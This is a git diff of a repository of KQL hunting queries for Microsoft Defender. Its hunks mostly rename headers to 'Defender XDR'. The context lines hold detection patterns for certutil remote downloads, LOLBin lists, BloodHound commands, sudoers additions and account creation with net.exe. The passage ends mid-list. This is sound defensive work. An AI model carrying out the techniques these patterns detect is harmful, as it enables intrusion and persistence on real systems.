Apps/OneDriveSyncFromRareIP.md index 31b0070..40e9587 100644 --- a/Defender For Cloud Apps/OneDriveSyncFromRareIP.md +++ b/Defender For Cloud Apps/OneDriveSyncFromRareIP.md @@ -52,4 +52,4 @@ CloudAppEvents // Filter if the activity happens in combination with a rare IP | join kind=inner EntraUserIPInfo on $left.AccountId == $right.UserId | project TimeGenerated, TotalEvents, BaseFolders, AccountId, AccountDisplayName, DeviceType, OSPlatform, IPAddress, IPEventCount -``` \ No newline at end of file +``` diff --git a/Defender For Cloud Apps/RiskyIPActivities.md b/Defender For Cloud Apps/RiskyIPActivities.md index 652ab3f..aad67ec 100644 --- a/Defender For Cloud Apps/RiskyIPActivities.md +++ b/Defender For Cloud Apps/RiskyIPActivities.md @@ -1,6 +1,6 @@ # Detect risky IP activities -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/SupressionRuleCreations.md b/Defender For Cloud Apps/SupressionRuleCreations.md index fb9f37c..4a09e5d 100644 --- a/Defender For Cloud Apps/SupressionRuleCreations.md +++ b/Defender For Cloud Apps/SupressionRuleCreations.md @@ -1,6 +1,6 @@ # Detect supression rule creations -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/Visualization - ActionsPerformed.md b/Defender For Cloud Apps/Visualization - ActionsPerformed.md index a6a7b0f..c12699b 100644 --- a/Defender For Cloud Apps/Visualization - ActionsPerformed.md +++ b/Defender For Cloud Apps/Visualization - ActionsPerformed.md @@ -1,6 +1,6 @@ # Visualisation of ActionTypes that have been seen in the Cloud App logs in the last 30 days -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/Visualization - HardDeletionsByUser.md b/Defender For Cloud Apps/Visualization - HardDeletionsByUser.md index 405e136..507c761 100644 --- a/Defender For Cloud Apps/Visualization - HardDeletionsByUser.md +++ b/Defender For Cloud Apps/Visualization - HardDeletionsByUser.md @@ -1,6 +1,6 @@ # Visualisation of the users with the most HardDelete actions performed -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/Visualization - OperationsPerformed.md b/Defender For Cloud Apps/Visualization - OperationsPerformed.md index 0f4f688..5c2f168 100644 --- a/Defender For Cloud Apps/Visualization - OperationsPerformed.md +++ b/Defender For Cloud Apps/Visualization - OperationsPerformed.md @@ -1,6 +1,6 @@ # Visualisation of operations that have been seen in the Cloud App logs in the last 30 days -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/Visualization - OutdatedOSUsed.md b/Defender For Cloud Apps/Visualization - OutdatedOSUsed.md index 5968286..1e33449 100644 --- a/Defender For Cloud Apps/Visualization - OutdatedOSUsed.md +++ b/Defender For Cloud Apps/Visualization - OutdatedOSUsed.md @@ -1,6 +1,6 @@ # Visualise the outdated Operating Systems used to connect to your cloud environment -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Endpoint/AMSIScriptDetections.md b/Defender For Endpoint/AMSIScriptDetections.md index e091fdb..3887cc8 100644 --- a/Defender For Endpoint/AMSIScriptDetections.md +++ b/Defender For Endpoint/AMSIScriptDetections.md @@ -19,7 +19,7 @@ An adversary uses PowerShell to execute malicious scripts in which AMSI detects #### References - https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType == "AmsiScriptDetection" @@ -32,4 +32,4 @@ DeviceEvents | where ActionType == "AmsiScriptDetection" | extend Description = tostring(parse_json(AdditionalFields).Description) | project TimeGenerated, DeviceName, InitiatingProcessCommandLine, Description -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/ASR Rules/ASR-RulesTriggeredByDevice.md b/Defender For Endpoint/ASR Rules/ASR-RulesTriggeredByDevice.md index de1bde6..d6a0e4f 100644 --- a/Defender For Endpoint/ASR Rules/ASR-RulesTriggeredByDevice.md +++ b/Defender For Endpoint/ASR Rules/ASR-RulesTriggeredByDevice.md @@ -8,7 +8,7 @@ This query gives an overview of the amount of ASR triggers for each device. A hi #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType startswith "Asr" diff --git a/Defender For Endpoint/ASR Rules/AsrExecutableOfficeContent.md b/Defender For Endpoint/ASR Rules/AsrExecutableOfficeContent.md index 4691d14..7699194 100644 --- a/Defender For Endpoint/ASR Rules/AsrExecutableOfficeContent.md +++ b/Defender For Endpoint/ASR Rules/AsrExecutableOfficeContent.md @@ -21,7 +21,7 @@ A malcious Office Application has run and resulted in a attacker that gained Per #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-office-applications-from-creating-executable-content -## Defender For Endpoint +## Defender XDR ``` // To prevent False Positives a FilePrevalanceThreshold is used. let FilePrevalanceThreshold = 100; @@ -41,4 +41,4 @@ DeviceEvents // Enrich results with File information | invoke FileProfile('SHA1', 10000) | project TimeGenerated, DeviceName, InitiatingProcessAccountUpn, FileName, FolderPath, ActionType, SHA1, InitiatingProcessCommandLine, InitiatingProcessFolderPath -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/ASR Rules/AsrRansomware.md b/Defender For Endpoint/ASR Rules/AsrRansomware.md index b6a5d16..cd7aa13 100644 --- a/Defender For Endpoint/ASR Rules/AsrRansomware.md +++ b/Defender For Endpoint/ASR Rules/AsrRansomware.md @@ -17,7 +17,7 @@ A actor has gained access to your network and tries to execute ransomware. #### References - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#use-advanced-protection-against-ransomware -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ingestion_time() > ago(30d) diff --git a/Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md b/Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md index b564596..66bd82e 100644 --- a/Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md +++ b/Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md @@ -8,7 +8,7 @@ This query returns a row for each device and states for every rule the configura #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceTvmInfoGathering | summarize arg_max(Timestamp, DeviceId, DeviceName, AdditionalFields) by DeviceId diff --git a/Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md b/Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md index 3ee91ee..9d4e126 100644 --- a/Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md +++ b/Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md @@ -8,7 +8,7 @@ This query returns a row for each device with a count for each Attack Surface Re #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType startswith 'ASR' diff --git a/Defender For Endpoint/AnomalousSMBSessionsCreated.md b/Defender For Endpoint/AnomalousSMBSessionsCreated.md index 1765ba3..75e6f71 100644 --- a/Defender For Endpoint/AnomalousSMBSessionsCreated.md +++ b/Defender For Endpoint/AnomalousSMBSessionsCreated.md @@ -14,7 +14,7 @@ This detection rule is aimed to detect a host that performs SMB Discovery by ale #### Risk A actor has gotten access to a system en performs a scan to identify possible lateral movement paths. -## Defender For Endpoint +## Defender XDR ```KQL DeviceNetworkEvents | where ingestion_time() > ago(1h) diff --git a/Defender For Endpoint/BloodHoundProcessDetection.md b/Defender For Endpoint/BloodHoundProcessDetection.md index c1ac745..08e1390 100644 --- a/Defender For Endpoint/BloodHoundProcessDetection.md +++ b/Defender For Endpoint/BloodHoundProcessDetection.md @@ -8,7 +8,7 @@ This query detects the use of bloodhound based on the processes it creates. This #### References - https://redcanary.com/threat-detection-report/threats/bloodhound/ -## Defender For Endpoint +## Defender XDR ``` // List with known bloodhound executions let BloodhoundCommands = dynamic(['-collectionMethod', 'invoke-bloodhound' ,'get-bloodHounddata']); diff --git a/Defender For Endpoint/CommandlineGroupAddition.md b/Defender For Endpoint/CommandlineGroupAddition.md index 925fd63..61e4dc5 100644 --- a/Defender For Endpoint/CommandlineGroupAddition.md +++ b/Defender For Endpoint/CommandlineGroupAddition.md @@ -11,7 +11,7 @@ An attacker got access to a system and added an account to a group. #### References - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL // Source Sensitive Groups: https://techcommunity.microsoft.com/t5/security-compliance-and-identity/alert-when-a-group-is-added-to-a-sensitive-active-directory/ba-p/3436868 let SensitiveGroupName = pack_array( // Declare Sensitive Group names. Add any groups that you manually tagged as sensitive @@ -64,4 +64,4 @@ DeviceProcessEvents | where ProcessCommandLine has_all ("add", "group") | extend GroupIsSentitive = iff(ProcessCommandLine has_any (SensitiveGroupName), 1, 0) | project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, GroupIsSentitive -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/CommandlineUserAddition.md b/Defender For Endpoint/CommandlineUserAddition.md index 17fced9..759a69c 100644 --- a/Defender For Endpoint/CommandlineUserAddition.md +++ b/Defender For Endpoint/CommandlineUserAddition.md @@ -21,7 +21,7 @@ An attacker got access to a system and created an account for persitence. #### References - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where FileName in ("net.exe", "net1.exe") @@ -34,4 +34,4 @@ DeviceProcessEvents | where FileName in ("net.exe", "net1.exe") | where ProcessCommandLine has_all ("add", "user") | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/CommandlineWithClearTextPassword.md b/Defender For Endpoint/CommandlineWithClearTextPassword.md index b16acac..45e5484 100644 --- a/Defender For Endpoint/CommandlineWithClearTextPassword.md +++ b/Defender For Endpoint/CommandlineWithClearTextPassword.md @@ -16,7 +16,7 @@ To limit false positives a filter can be used to only filter if both a username #### Risk Cleartext passwords can be logged and used by attackers to gain access to accounts. -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where ProcessCommandLine has_all ("-password", "*") @@ -35,4 +35,4 @@ DeviceProcessEvents //| where isnotempty(UserName) | summarize TotalExecutions = count(), UniqueCommands = dcount(ProcessCommandLine), CommandLines = make_set(ProcessCommandLine, 1000), UniqueUsers = dcount(UserName), UserNames = make_set(UserName) by DeviceName | sort by UniqueUsers, UniqueCommands, TotalExecutions -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/DefenderDiscoveryActivities.md b/Defender For Endpoint/DefenderDiscoveryActivities.md index 56cc755..6f004db 100644 --- a/Defender For Endpoint/DefenderDiscoveryActivities.md +++ b/Defender For Endpoint/DefenderDiscoveryActivities.md @@ -20,7 +20,7 @@ Adversaries can use Get-MpPreference to list exclusions, those exclusions can be - https://learn.microsoft.com/en-us/powershell/module/defender/get-mppreference?view=windowsserver2022-ps - https://cloudbrothers.info/en/create-persistent-defender-av-exclusions-circumvent-defender-endpoint-detection/ -## Defender For Endpoint +## Defender XDR ```KQL let ProcessBased = DeviceProcessEvents | where ProcessCommandLine has "Get-MpPreference" @@ -47,4 +47,4 @@ let EventBased = DeviceEvents | extend Table = "DeviceEvents" | project-reorder Table, TimeGenerated, DeviceName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, ScriptLocation; union ProcessBased, EventBased -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Detect_Known_RAT_RMM_Process_Patterns.md b/Defender For Endpoint/Detect_Known_RAT_RMM_Process_Patterns.md index 32381e1..7ec0d25 100644 --- a/Defender For Endpoint/Detect_Known_RAT_RMM_Process_Patterns.md +++ b/Defender For Endpoint/Detect_Known_RAT_RMM_Process_Patterns.md @@ -28,7 +28,7 @@ The results will contain a summary table, listint the following columns: Unique - [RATs Race: Detecting remote access tools beyond pattern-based indicators](https://detect.fyi/rats-race-detecting-remote-access-tools-beyond-pattern-based-indicators-5c864b171892) -## Defender For Endpoint +## Defender XDR ```KQL // Author: Alex Teixeira (alex@opstune.com) DeviceProcessEvents diff --git a/Defender For Endpoint/DevicesWithMostSMBConnections.md b/Defender For Endpoint/DevicesWithMostSMBConnections.md index 435e8df..280838b 100644 --- a/Defender For Endpoint/DevicesWithMostSMBConnections.md +++ b/Defender For Endpoint/DevicesWithMostSMBConnections.md @@ -5,7 +5,7 @@ #### Description This hunting query lists all the devices and the unique connections they have made with a remote SMB port. Devices with a large number of connected SMB sessions can be interesting to investigate. -## Defender For Endpoint +## Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/DevicesWithTheMostSMBSessions.md b/Defender For Endpoint/DevicesWithTheMostSMBSessions.md index 4f5c257..a67ea0b 100644 --- a/Defender For Endpoint/DevicesWithTheMostSMBSessions.md +++ b/Defender For Endpoint/DevicesWithTheMostSMBSessions.md @@ -5,7 +5,7 @@ #### Description List all devices with the amount of SMB sessions they have. -## Defender For Endpoint +## Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days diff --git a/Defender For Endpoint/Discovery - DatabaseServices.md b/Defender For Endpoint/Discovery - DatabaseServices.md index 789d5f7..eb41bef 100644 --- a/Defender For Endpoint/Discovery - DatabaseServices.md +++ b/Defender For Endpoint/Discovery - DatabaseServices.md @@ -27,7 +27,7 @@ An adversary has gained access into your network and tries to find lateral movem - https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf - https://securelist.com/malicious-tasks-in-ms-sql-server/92167/ -## Defender For Endpoint +## Defender XDR ```KQL let DatabasePorts = dynamic([1433, 1434, 1583, 3050, 3306, 3351, 5432]); // Device List with devices that perform benign connections to SQL machines diff --git a/Defender For Endpoint/ExecutableFilesPublicFolder.md b/Defender For Endpoint/ExecutableFilesPublicFolder.md index ecb0e02..ee9ebf7 100644 --- a/Defender For Endpoint/ExecutableFilesPublicFolder.md +++ b/Defender For Endpoint/ExecutableFilesPublicFolder.md @@ -16,7 +16,7 @@ An adversary creates payloads in the C:\Users\Public to stay undetected. - https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-203a - https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/ -## Defender For Endpoint +## Defender XDR ``` // The start of the folderpath in the Public directory. let PublicFolder = @'C:\Users\Public'; @@ -47,4 +47,4 @@ DeviceFileEvents | extend FileExtension = tostring(extract(@'.*\.(.*)', 1, FileName)) // Only list Files that are executable | where FileExtension in~ (ExecutableFileExtensions) -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/ExploitGuardNetworkProtection.md b/Defender For Endpoint/ExploitGuardNetworkProtection.md index 687671c..c92c11b 100644 --- a/Defender For Endpoint/ExploitGuardNetworkProtection.md +++ b/Defender For Endpoint/ExploitGuardNetworkProtection.md @@ -12,7 +12,7 @@ A user has accessed (or tried to access) a malicious website. If the Exploit Gua - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/network-protection?view=o365-worldwide#advanced-hunting - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/manage-indicators?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType in~ ('ExploitGuardNetworkProtectionBlocked', 'ExploitGuardNetworkProtectionAudited') @@ -45,4 +45,4 @@ DeviceEvents RemoteUrl, ResponseCategory, DisplayName -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/HTTPDownloadsByFileExtention.md b/Defender For Endpoint/HTTPDownloadsByFileExtention.md index bb03c43..90a08e8 100644 --- a/Defender For Endpoint/HTTPDownloadsByFileExtention.md +++ b/Defender For Endpoint/HTTPDownloadsByFileExtention.md @@ -1,6 +1,6 @@ # List the file extentions that have been used during a HTTP GET request ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/HTTPExecutableFilesDownloaded.md b/Defender For Endpoint/HTTPExecutableFilesDownloaded.md index ddeb0e2..c3f22d4 100644 --- a/Defender For Endpoint/HTTPExecutableFilesDownloaded.md +++ b/Defender For Endpoint/HTTPExecutableFilesDownloaded.md @@ -1,6 +1,6 @@ # Executable File Extentions downloaded via HTTP GET ---- -### Defender For Endpoint +### Defender XDR ``` let ExecutableFileExtentions = dynamic(['bat', 'cmd', 'com', 'cpl', 'ex', 'exe', 'jse', 'lnk','msc', 'ps1', 'reg', 'vb', 'vbe', 'ws', 'wsf']); diff --git a/Defender For Endpoint/HTTPRequestMethodsStatistics.md b/Defender For Endpoint/HTTPRequestMethodsStatistics.md index d8734a2..f9cd5a4 100644 --- a/Defender For Endpoint/HTTPRequestMethodsStatistics.md +++ b/Defender For Endpoint/HTTPRequestMethodsStatistics.md @@ -1,6 +1,6 @@ # HTTP Request Methods Statistics ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/LatestAntivirusScanStatus.md b/Defender For Endpoint/LatestAntivirusScanStatus.md index b4053db..c4b359a 100644 --- a/Defender For Endpoint/LatestAntivirusScanStatus.md +++ b/Defender For Endpoint/LatestAntivirusScanStatus.md @@ -11,7 +11,7 @@ The Defender sensor is not working corretly and might not be able to idenfity su #### References - https://cloudbrothers.info/antivirus-scan-complete/ -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ActionType == "AntivirusScanCompleted" @@ -34,4 +34,4 @@ DeviceEvents // Filter only devices that have not performed a antivirus scan in the last day | where DaysAgo > 0 | sort by DaysAgo -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Linux/Linux - UsersAddedToSudoersGroup.md b/Defender For Endpoint/Linux/Linux - UsersAddedToSudoersGroup.md index 74ed83f..9341e6d 100644 --- a/Defender For Endpoint/Linux/Linux - UsersAddedToSudoersGroup.md +++ b/Defender For Endpoint/Linux/Linux - UsersAddedToSudoersGroup.md @@ -14,7 +14,7 @@ This query allows you to hunt for users that have been added to the sudo group. #### Risk A advasary adds itself to the sudoers group and can perform actions with root privileges. -## Defender For Endpoint +## Defender XDR ``` let Commands = dynamic([@"usermod -aG sudo", @"usermod -a -G sudo"]); diff --git a/Defender For Endpoint/ListTamperingAttempts.md b/Defender For Endpoint/ListTamperingAttempts.md index d190406..ba33d67 100644 --- a/Defender For Endpoint/ListTamperingAttempts.md +++ b/Defender For Endpoint/ListTamperingAttempts.md @@ -11,7 +11,7 @@ An adversary tries to disable security logging / monitoring to perform malicious #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType == "TamperingAttempt" @@ -24,4 +24,4 @@ DeviceEvents | where ActionType == "TamperingAttempt" | extend TamperingAction = tostring(parse_json(AdditionalFields).TamperingAction), Status = tostring(parse_json(AdditionalFields).Status), Target = tostring(parse_json(AdditionalFields).Target) | summarize TotalActions = count(), Actions = make_set(TamperingAction), Targets = make_set(Target), RegistryNames = make_set(RegistryValueName), InitatingCommandLine = make_set(InitiatingProcessCommandLine) by DeviceName -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Living Off The Land/CertutilRemoteDownload.md b/Defender For Endpoint/Living Off The Land/CertutilRemoteDownload.md index 14b5006..0502c7f 100644 --- a/Defender For Endpoint/Living Off The Land/CertutilRemoteDownload.md +++ b/Defender For Endpoint/Living Off The Land/CertutilRemoteDownload.md @@ -24,7 +24,7 @@ An adversary transfered tools to the local device for execution. - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where FileName == "certutil.exe" @@ -37,4 +37,4 @@ DeviceProcessEvents | where FileName == "certutil.exe" | where tolower(ProcessCommandLine) has_all ("http", "urlcache", "-f") | project-reorder TimeGenerated, ProcessCommandLine, FileName, InitiatingProcessAccountUpn -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Living Off The Land/LOLBinRemoteIPCommandLine.md b/Defender For Endpoint/Living Off The Land/LOLBinRemoteIPCommandLine.md index c3ecf71..1c83433 100644 --- a/Defender For Endpoint/Living Off The Land/LOLBinRemoteIPCommandLine.md +++ b/Defender For Endpoint/Living Off The Land/LOLBinRemoteIPCommandLine.md @@ -8,7 +8,7 @@ This query returns all LOLbins that refer to a remote IP in the commandline. The #### References - https://lolbas-project.github.io/ -## Defender For Endpoint +## Defender XDR ```KQL let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; let LOLBins = dynamic(["AppInstaller.exe", "cmd.exe", "Aspnet_Compiler.exe", "At.exe", "Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "CertOC.exe", "CertReq.exe", "Certutil.exe", "Cmdkey.exe", "cmdl32.exe", "Cmstp.exe", "ConfigSecurityPolicy.exe", "Conhost.exe", "Control.exe", "Csc.exe", "Cscript.exe", "CustomShellHost.exe", "DataSvcUtil.exe", "Desktopimgdownldr.exe", "DeviceCredentialDeployment.exe", "Dfsvc.exe", "Diantz.exe", "Diskshadow.exe", "Dnscmd.exe", "Esentutl.exe", "Eventvwr.exe", "Expand.exe", "Explorer.exe", "Extexport.exe", "Extrac32.exe", "Findstr.exe", "Finger.exe", "fltMC.exe", "Forfiles.exe", "Ftp.exe", "Gpscript.exe", "Hh.exe", "IMEWDBLD.exe", "Ie4uinit.exe", "Ieexec.exe", "Ilasm.exe", "Infdefaultinstall.exe", "Installutil.exe", "Jsc.exe", "Ldifde.exe", "Makecab.exe", "Mavinject.exe", "Msedge.exe", "Microsoft.Workflow.Compiler.exe", "Mmc.exe", "MpCmdRun.exe", "Msbuild.exe", "Msconfig.exe", "Msdt.exe", "Mshta.exe", "Msiexec.exe", "Netsh.exe", "Odbcconf.exe", "OfflineScannerShell.exe", "OneDriveStandaloneUpdater.exe", "Pcalua.exe", "Pcwrun.exe", "Pktmon.exe", "Pnputil.exe", "Presentationhost.exe", "Print.exe", "PrintBrm.exe", "Psr.exe", "Rasautou.exe", "rdrleakdiag.exe", "Reg.exe", "Regasm.exe", "Regedit.exe", "Regini.exe", "Register-cimprovider.exe", "Regsvcs.exe", "Regsvr32.exe", "Replace.exe", "Rpcping.exe", "Rundll32.exe", "Runexehelper.exe", "Runonce.exe", "Runscripthelper.exe", "Sc.exe", "Schtasks.exe", "Scriptrunner.exe", "Setres.exe", "SettingSyncHost.exe", "Stordiag.exe", "SyncAppvPublishingServer.exe", "Ttdinject.exe", "Tttracer.exe", "Unregmp2.exe", "vbc.exe", "Verclsid.exe", "Wab.exe", "winget.exe", "Wlrmdr.exe", "Wmic.exe", "WorkFolders.exe", "Wscript.exe", "Wsreset.exe", "wuauclt.exe", "Xwizard.exe", "fsutil.exe", "wt.exe", "GfxDownloadWrapper.exe", "Advpack.dll", "Desk.cpl", "Dfshim.dll", "Ieadvpack.dll", "Ieframe.dll", "Mshtml.dll", "Pcwutl.dll", "Setupapi.dll", "Shdocvw.dll", "Shell32.dll", "Syssetup.dll", "Url.dll", "Zipfldr.dll", "Comsvcs.dll", "AccCheckConsole.exe", "adplus.exe", "AgentExecutor.exe", "Appvlp.exe", "Bginfo.exe", "Cdb.exe", "coregen.exe", "Createdump.exe", "csi.exe", "DefaultPack.EXE", "Devinit.exe"]); diff --git a/Defender For Endpoint/Living Off The Land/LOLBinStatistics.md b/Defender For Endpoint/Living Off The Land/LOLBinStatistics.md index f88f8e4..6ca64ef 100644 --- a/Defender For Endpoint/Living Off The Land/LOLBinStatistics.md +++ b/Defender For Endpoint/Living Off The Land/LOLBinStatistics.md @@ -8,7 +8,7 @@ List the the statistics of LOLBINS that have been executed. Mostly the rare lolb #### References - https://lolbas-project.github.io/ -## Defender For Endpoint +## Defender XDR ``` let LOLBins = dynamic(["AppInstaller.exe", "Aspnet_Compiler.exe", "At.exe", "Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "CertOC.exe", "CertReq.exe", "Certutil.exe", "Cmd.exe", "Cmdkey.exe", "cmdl32.exe", "Cmstp.exe", "ConfigSecurityPolicy.exe", "Conhost.exe", "Control.exe", "Csc.exe", "Cscript.exe", "CustomShellHost.exe", "DataSvcUtil.exe", "Desktopimgdownldr.exe", "DeviceCredentialDeployment.exe", "Dfsvc.exe", "Diantz.exe", "Diskshadow.exe", "Dnscmd.exe", "Esentutl.exe", "Eventvwr.exe", "Expand.exe", "Explorer.exe", "Extexport.exe", "Extrac32.exe", "Findstr.exe", "Finger.exe", "fltMC.exe", "Forfiles.exe", "Ftp.exe", "Gpscript.exe", "Hh.exe", "IMEWDBLD.exe", "Ie4uinit.exe", "Ieexec.exe", "Ilasm.exe", "Infdefaultinstall.exe", "Installutil.exe", "Jsc.exe", "Ldifde.exe", "Makecab.exe", "Mavinject.exe", "Msedge.exe", "Microsoft.Workflow.Compiler.exe", "Mmc.exe", "MpCmdRun.exe", "Msbuild.exe", "Msconfig.exe", "Msdt.exe", "Mshta.exe", "Msiexec.exe", "Netsh.exe", "Odbcconf.exe", "OfflineScannerShell.exe", "OneDriveStandaloneUpdater.exe", "Pcalua.exe", "Pcwrun.exe", "Pktmon.exe", "Pnputil.exe", "Presentationhost.exe", "Print.exe", "PrintBrm.exe", "Psr.exe", "Rasautou.exe", "rdrleakdiag.exe", "Reg.exe", "Regasm.exe", "Regedit.exe", "Regini.exe", "Register-cimprovider.exe", "Regsvcs.exe", "Regsvr32.exe", "Replace.exe", "Rpcping.exe", "Rundll32.exe", "Runexehelper.exe", "Runonce.exe", "Runscripthelper.exe", "Sc.exe", "Schtasks.exe", "Scriptrunner.exe", "Setres.exe", "SettingSyncHost.exe", "Stordiag.exe", "SyncAppvPublishingServer.exe", "Ttdinject.exe", "Tttracer.exe", "Unregmp2.exe", "vbc.exe", "Verclsid.exe", "Wab.exe", "winget.exe", "Wlrmdr.exe", "Wmic.exe", "WorkFolders.exe", "Wscript.exe", "Wsreset.exe", "wuauclt.exe", "Xwizard.exe", "fsutil.exe", "wt.exe", "GfxDownloadWrapper.exe", "Advpack.dll", "Desk.cpl", "Dfshim.dll", "Ieadvpack.dll", "Ieframe.dll", "Mshtml.dll", "Pcwutl.dll", "Setupapi.dll", "Shdocvw.dll", "Shell32.dll", "Syssetup.dll", "Url.dll", "Zipfldr.dll", "Comsvcs.dll", "AccCheckConsole.exe", "adplus.exe", "AgentExecutor.exe", "Appvlp.exe", "Bginfo.exe", "Cdb.exe", "coregen.exe", "Createdump.exe", "csi.exe", "DefaultPack.EXE", "Devinit.exe"]); DeviceProcessEvents diff --git a/Defender For Endpoint/Living Off The Land/LOLDriverUsage.md b/Defender For Endpoint/Living Off The Land/LOLDriverUsage.md index ed0fed5..441a589 100644 --- a/Defender For Endpoint/Living Off The Land/LOLDriverUsage.md +++ b/Defender For Endpoint/Living Off The Land/LOLDriverUsage.md @@ -11,7 +11,7 @@ An adversary uses a loldriver to perform malicious activities. #### References - https://www.loldrivers.io/ -## Defender For Endpoint +## Defender XDR ``` let LolDriverSHA1 = externaldata(SHA1: string)[@"https://raw.githubusercontent.com/magicsword-io/LOLDrivers/main/detections/hashes/authentihash_samples.sha1"] with (format="txt", ignoreFirstRecord=False); // Combine results to get ImageLoads, FileActions and Process Events diff --git a/Defender For Endpoint/Living Off The Land/LOTSUsage.md b/Defender For Endpoint/Living Off The Land/LOTSUsage.md index a244413..61609f9 100644 --- a/Defender For Endpoint/Living Off The Land/LOTSUsage.md +++ b/Defender For Endpoint/Living Off The Land/LOTSUsage.md @@ -18,7 +18,7 @@ An actor uses Living Off Trusted Sites to host their malicious infrastructure - https://lots-project.com/ -## Defender For Endpoint +## Defender XDR ``` // THIS QUERY IS ONLY FOR HUNTING, NOT FOR DETECTION. IT WILL GENERATE TO MUCH FPs. // The query levarages the Living Off Trusted Sites from: https://lots-project.com/ @@ -103,4 +103,4 @@ DeviceNetworkEvents | sort by TotalCount // Project all fields | project Domain, TotalCount, UniqueURLs, TotalDevices, TotalInitiatingFiles, RemotePorts, URLs, Devices, InitiatingFiles -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Living Off The Land/NewLOLBinExternalConnection.md b/Defender For Endpoint/Living Off The Land/NewLOLBinExternalConnection.md index 8d5e3d8..0486bb2 100644 --- a/Defender For Endpoint/Living Off The Land/NewLOLBinExternalConnection.md +++ b/Defender For Endpoint/Living Off The Land/NewLOLBinExternalConnection.md @@ -14,7 +14,7 @@ An actor has gained access to your network and uses a rare lolbin to communicate #### References - https://lolbas-project.github.io/ -## Defender For Endpoint +## Defender XDR ``` let LOLBins = dynamic(["AppInstaller.exe", "Aspnet_Compiler.exe", "At.exe", "Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "CertOC.exe", "CertReq.exe", "Certutil.exe", "Cmd.exe", "Cmdkey.exe", "cmdl32.exe", "Cmstp.exe", "ConfigSecurityPolicy.exe", "Conhost.exe", "Control.exe", "Csc.exe", "Cscript.exe", "CustomShellHost.exe", "DataSvcUtil.exe", "Desktopimgdownldr.exe", "DeviceCredentialDeployment.exe", "Dfsvc.exe", "Diantz.exe", "Diskshadow.exe", "Dnscmd.exe", "Esentutl.exe", "Eventvwr.exe", "Expand.exe", "Explorer.exe", "Extexport.exe", "Extrac32.exe", "Findstr.exe", "Finger.exe", "fltMC.exe", 